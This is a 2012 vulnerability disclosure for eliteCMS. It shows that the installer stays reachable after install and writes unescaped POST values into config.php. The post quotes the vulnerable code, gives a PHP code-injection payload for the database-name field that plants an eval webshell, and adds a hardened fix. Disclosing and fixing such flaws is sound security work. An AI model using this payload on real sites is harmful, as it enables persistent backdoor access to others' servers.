eliteCMS: installer not locked after installation + one-line webshell write vulnerability

Posted on 2012-11-18 13:59:27
The eliteCMS installer is not locked once installation has finished, so anyone who can reach the installer URL can run the installation again.

The second issue is that the installer can write a one-line backdoor straight into admin/includes/config.php.

Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    // Installer step 4: generate admin/includes/config.php from values held in the session
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // Session values are interpolated unescaped into PHP source text
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The assembled source is written to disk; no install lock is created afterwards
    $writer = fopen($file, 'w');
...

Now look at where those session values come from:

// POST fields are copied into the session with no validation or escaping
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name POSTed is:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
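As an added example (not eliteCMS code), here is how the step-4 writer could be hardened against both problems above: refuse to run while an install lock exists, validate each value, and emit every value through var_export() so that it lands in config.php as a string literal rather than as source text. The lock-file path, the function names and the sample values are assumptions; the config path is the one from the post.

```php
<?php
// Added example, not eliteCMS code: a hardened replacement for the installer's
// step-4 config writer. Lock-file path, function names and sample values are assumed.
declare(strict_types=1);

const INSTALL_LOCK = __DIR__ . '/install.lock';                 // assumed location
const CONFIG_PATH  = __DIR__ . '/../admin/includes/config.php'; // path from the post

// The installer must refuse to run once an install has completed.
function installer_locked(): bool
{
    return file_exists(INSTALL_LOCK);
}

// Host, database and user names are restricted to a conservative character set;
// the password may contain anything because it is never interpolated raw.
function validate_db_value(string $key, string $value): string
{
    if ($value === '' || strlen($value) > 128) {
        throw new InvalidArgumentException("$key is empty or too long");
    }
    if ($key !== 'DB_PASS' && !preg_match('/^[A-Za-z0-9_.:-]+$/', $value)) {
        throw new InvalidArgumentException("$key contains disallowed characters");
    }
    return $value;
}

// Every value goes through var_export(), so "?><?php eval($_POST[c]);?><?php
// becomes a single-quoted PHP string literal: ?> and $ are inert inside it.
function build_config(array $settings): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $value = validate_db_value($key, (string)($settings[$key] ?? ''));
        $out .= sprintf("define(%s, %s);\n", var_export($key, true), var_export($value, true));
    }
    return $out; // no closing ?> tag, so nothing after it can leak out as output
}

function write_config(array $settings): void
{
    if (installer_locked()) {
        http_response_code(403);
        exit('Installer is locked.');
    }
    $config = build_config($settings);          // validate before touching disk
    $tmp = CONFIG_PATH . '.tmp';
    file_put_contents($tmp, $config, LOCK_EX);
    rename($tmp, CONFIG_PATH);                  // atomic replace
    file_put_contents(INSTALL_LOCK, date('c') . "\n"); // lock as soon as install succeeds
}

// Constructed checks using the payload shape quoted in the post.
try {
    build_config(['DB_SERVER' => 'localhost', 'DB_USER' => 'elite', 'DB_PASS' => 'x',
                  'DB_NAME' => '"?><?php eval($_POST[c]);?><?php']);
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";   // DB_NAME contains disallowed characters
}
echo build_config(['DB_SERVER' => 'localhost', 'DB_NAME' => 'elitecms', 'DB_USER' => 'elite',
                   'DB_PASS' => '"?><?php eval($_POST[c]);?><?php']);
// The DB_PASS line comes out as define('DB_PASS', '"?><?php eval($_POST[c]);?><?php');
// which is a quoted string, not executable code.
```

The two defences are independent: the lock file stops re-running the installer at all, and var_export() stops a value from ever being parsed as PHP even if the installer is reached. Writing to a temporary file and renaming it means a half-written config.php is never left behind if the process is interrupted.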